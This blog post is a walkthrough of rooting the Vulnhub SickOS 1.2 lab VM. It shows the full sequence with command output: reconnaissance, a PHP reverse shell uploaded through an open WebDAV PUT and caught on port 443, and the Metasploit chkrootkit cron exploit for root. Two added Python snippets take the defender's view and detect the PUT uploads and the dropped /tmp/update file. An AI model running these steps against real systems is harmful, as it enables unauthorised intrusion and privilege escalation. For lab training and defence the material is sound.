Hello friend! I know I was inactive on this blog for a while, but now I'm planning to be active again. Anyway, today I am going to show how I pwned the Vulnhub SickOS 1.2 machine and give you a walkthrough for it.
Description of SickOs 1.2 on Vulnhub:
This is the second in the following series from SickOs 1.2 and is independent of the prior releases; the scope of the challenge is to gain the highest privileges on the system.
Difficulty: beginner
Vulnhub SickOS 1.2 Walkthrough: Let's Get Started!!
First we need to find out the target machine's (SickOs 1.2) IP in order to gather information about it.
Here I simply used nmap's -sn (host discovery) option against the whole subnet of my own IP and got the IP address of the VirtualBox machine running SickOs 1.2.
```text
root@r00t3v1l:~# nmap -sn 192.168.0.25/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for 192.168.0.1
Host is up (0.0036s latency).
MAC Address: 98:2F:3C:DE:AD:05 (Sichuan Changhong Electric)
Nmap scan report for 192.168.0.49
Host is up (0.00038s latency).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.50
Host is up (0.12s latency).
MAC Address: 34:E6:AD:A3:E3:23 (Intel Corporate)
Nmap scan report for 192.168.0.25
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.32 seconds
```

Now that we have the IP address, it's time for an nmap scan to detect open ports and the services running on them.
Here I have used nmap with:
- the -sV option to scan for service versions
- the -sC option to run the default nmap NSE scripts
- the -p- (or -p 0-65535) option to scan all the ports
```text
root@r00t3v1l:~# nmap -sV -sC 192.168.0.49 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for 192.168.0.49
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.59 seconds
root@r00t3v1l:~#
```

So far we have found 2 ports open:
- 22 SSH
- 80 http
So I ran dirb to look for potential hidden directories on the SickOs 1.2 machine and found the /test/ directory.
```text
root@r00t3v1l:~# dirb http://192.168.0.49/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 20 23:25:34 2018
URL_BASE: http://192.168.0.49/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.49/ ----
+ http://192.168.0.49/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.0.49/test/
---- Entering directory: http://192.168.0.49/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jun 20 23:25:35 2018
DOWNLOADED: 4612 - FOUND: 1
root@r00t3v1l:~#
```

I checked the /test/ directory and found that it is served by a lighttpd 1.4.28 server. I quickly checked for available exploits for it but got nothing working.
Looking for the available HTTP methods on this /test/ directory using curl, I found that the PUT method is allowed, which we can use to upload files to this directory.
```text
root@r00t3v1l:~# curl -vv -X OPTIONS http://192.168.0.49/test/
* Trying 192.168.0.49...
* TCP_NODELAY set
* Connected to 192.168.0.49 (192.168.0.49) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.0.49
> User-Agent: curl/7.60.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 20 Jun 2018 18:09:47 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.0.49 left intact
root@r00t3v1l:~#
```

I uploaded a PHP reverse shell to the /test/ directory through the PUT HTTP method using curl and got a lovely message: "We are completely uploaded and fine".

```text
root@r00t3v1l:~# curl -v --upload-file /root/shell.php http://192.168.0.49/test/r00t.php -0
* Trying 192.168.0.49...
* TCP_NODELAY set
* Connected to 192.168.0.49 (192.168.0.49) port 80 (#0)
> PUT /test/r00t.php HTTP/1.0
> Host: 192.168.0.49
> User-Agent: curl/7.60.0
> Accept: */*
> Content-Length: 5494
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 20 Jun 2018 18:15:13 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
root@r00t3v1l:~#
```
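As an added example that is not part of the original post, here is a small Python audit a defender can run offline against the kind of OPTIONS response and web server access log seen above: it merges the two Allow headers lighttpd sends, flags the WebDAV methods that permit unauthenticated content changes, and picks accepted PUT requests out of log lines. The log lines are constructed samples, and the parser assumes lighttpd's default accesslog.format (host, vhost, user, time, request, status, bytes, referer, user-agent).

```python
# Added example (not from the original post): offline audit helpers a defender
# can run against an OPTIONS response and a lighttpd access log.
import re

# HTTP/WebDAV methods that let a client change content on the server.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}

# Assumption: lighttpd's default accesslog.format, i.e.
# host vhost user [time] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

def parse_allow(raw_response: str) -> set:
    """Union of every Allow: header in an OPTIONS response (lighttpd sends two)."""
    methods = set()
    for line in raw_response.splitlines():
        line = line.lstrip("< ")            # tolerate curl's "< " prefix
        if line.lower().startswith("allow:"):
            methods.update(m.strip().upper()
                           for m in line.split(":", 1)[1].split(",") if m.strip())
    return methods

def risky_methods(methods: set) -> set:
    """Advertised methods that allow content changes without authentication."""
    return methods & WRITE_METHODS

def find_put_uploads(log_lines) -> list:
    """(client, path, status) for every PUT request the server accepted."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            client, _ts, method, path, status, _size = m.groups()
            if method == "PUT" and status in ("200", "201", "204"):
                hits.append((client, path, int(status)))
    return hits

# Constructed samples: the Allow headers from the curl output above and three
# access-log lines matching the requests made in this walkthrough.
SAMPLE_OPTIONS = """< HTTP/1.1 200 OK
< DAV: 1,2
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
"""
SAMPLE_LOG = [
    '192.168.0.25 192.168.0.49 - [20/Jun/2018:18:09:47 +0000] "OPTIONS /test/ HTTP/1.1" 200 0 "-" "curl/7.60.0"',
    '192.168.0.25 192.168.0.49 - [20/Jun/2018:18:15:13 +0000] "PUT /test/r00t.php HTTP/1.0" 201 0 "-" "curl/7.60.0"',
    '192.168.0.25 192.168.0.49 - [20/Jun/2018:18:16:02 +0000] "GET /test/r00t.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]
```

Running `risky_methods(parse_allow(SAMPLE_OPTIONS))` on the response above returns all eight WebDAV write methods, and `find_put_uploads(SAMPLE_LOG)` returns the single accepted upload of /test/r00t.php.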
Now simply set up a netcat (nc) listener and make an HTTP request to your uploaded reverse shell through your browser, and WOAH!!! you have a limited shell on the server.
One thing I noticed here is that the reverse shell is blocked on unusual ports like 4444 or 1337, probably due to iptables rules. It worked when I used port 443 instead.
Well, this is a limited shell we have got; if you want, you can upgrade it to a fully interactive TTY shell using:

```text
python -c 'import pty; pty.spawn("/bin/bash")'
```

After enumerating the SickOs 1.2 Vulnhub machine for some time, I found that a vulnerable cron job named chkrootkit is running, for which a Metasploit exploit is available:
exploit/unix/local/chkrootkit
but for this we need a reverse shell session in Metasploit, so we will use the multi/handler with the linux/x86/shell_reverse_tcp payload. Unfortunately Meterpreter is not working here.

```text
msf exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.25:443
[*] Command shell session 2 opened (192.168.0.25:443 -> 192.168.0.105:43170) at 2018-06-21 00:28:34 +0530
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
11:58:33 up 34 min, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ^Z
Background session 2? [y/N] y
msf exploit(multi/handler) >
```

Background the session using CTRL+Z, as shown at the end of the output above.
Now simply run the chkrootkit exploit, set your reverse shell session ID on it, and hit EXPLOIT!! :D
```text
msf exploit(multi/handler) > use exploit/unix/local/chkrootkit
msf exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf exploit(unix/local/chkrootkit) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on 192.168.0.25:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
```

Now we have to wait for chkrootkit to run. The thing is, the chkrootkit cron job runs once a day, so you have to wait for it to run, and after that you will get a root shell.
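From the defender's side, the module output above shows exactly what to look for on a host that runs chkrootkit from cron: the dropped file /tmp/update that the root-run cron job will execute. The following added example (my code, not part of the original post or of Metasploit) audits that file and compares an installed chkrootkit version against the release that fixed this behaviour; the 0.50 cut-off and the `chkrootkit version X.Y` output format are assumptions to verify against your distribution's changelog.

```python
# Added example (not from the original post): host checks for the chkrootkit
# cron job described above. Assumption: the fix shipped in chkrootkit 0.50.
import os
import stat
import tempfile

FIXED_VERSION = (0, 50)   # assumed cut-off; verify against your distro's changelog

def parse_version(text: str) -> tuple:
    """'chkrootkit version 0.49' or '0.49' -> (0, 49) for comparison."""
    return tuple(int(p) for p in text.strip().split()[-1].split("."))

def chkrootkit_vulnerable(version_text: str) -> bool:
    """True when the installed version predates the assumed fix."""
    return parse_version(version_text) < FIXED_VERSION

def audit_tmp_update(tmp_dir: str = "/tmp") -> dict:
    """Describe <tmp_dir>/update, the file a cron'd chkrootkit would run as root."""
    path = os.path.join(tmp_dir, "update")
    report = {"path": path, "present": os.path.lexists(path)}
    if report["present"]:
        st = os.lstat(path)
        report.update(
            executable=bool(st.st_mode & stat.S_IXUSR),
            world_writable=bool(st.st_mode & stat.S_IWOTH),
            owner_uid=st.st_uid,
            is_symlink=stat.S_ISLNK(st.st_mode),
        )
    return report

def demo() -> dict:
    """Constructed scenario: an executable 'update' file in a scratch directory."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "update")
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho placeholder\n")   # harmless stand-in file
        os.chmod(p, 0o755)
        return audit_tmp_update(d)
```

Scheduling `audit_tmp_update()` shortly before the daily chkrootkit cron run, and alerting on `present`, gives an early warning well before the job would execute anything.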
So this was the Vulnhub SickOS 1.2 walkthrough; I hope you enjoyed reading it. Please do leave your valuable comments below if it helped you :)